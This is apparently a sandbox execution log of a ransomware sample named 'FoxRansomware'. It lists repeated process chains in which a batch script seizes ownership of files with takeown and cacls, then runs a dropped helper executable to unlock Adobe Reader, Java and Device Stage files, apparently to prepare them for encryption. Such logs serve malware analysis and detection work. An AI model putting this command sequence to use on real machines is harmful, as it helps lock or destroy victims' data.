C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:3080
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:2060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "classes.jsa" -nobanner3⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "classes.jsa" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "background.png" -nobanner3⤵PID:268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "background.png" -nobanner4⤵PID:2364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:3028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Modifies file permissions
PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:3704
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:2712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:3728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:3764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:2936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "device.png" -nobanner3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "device.png" -nobanner4⤵PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:4036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:1696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:2240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:3252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "superbar.png" -nobanner3⤵PID:3400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "superbar.png" -nobanner4⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:2460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:2516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:2848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:2528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:2852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵
- Modifies file permissions
PID:3612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "create_form.gif" -nobanner3⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "create_form.gif" -nobanner4⤵PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:3000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:3724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "info.gif" -nobanner3⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "info.gif" -nobanner4⤵PID:3256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:3436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:3188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "trash.gif" -nobanner3⤵PID:3916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "trash.gif" -nobanner4⤵PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:3352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:2636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:2456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:3660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:2244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:2132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:3836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:2468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:2064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:3200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can.hyp" -nobanner3⤵PID:2912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can.hyp" -nobanner4⤵PID:3624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:2052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "usa37.hyp" -nobanner3⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "usa37.hyp" -nobanner4⤵PID:2092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:2484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:3952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "overlay.png" -nobanner3⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "overlay.png" -nobanner4⤵PID:296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3788
-
-
-
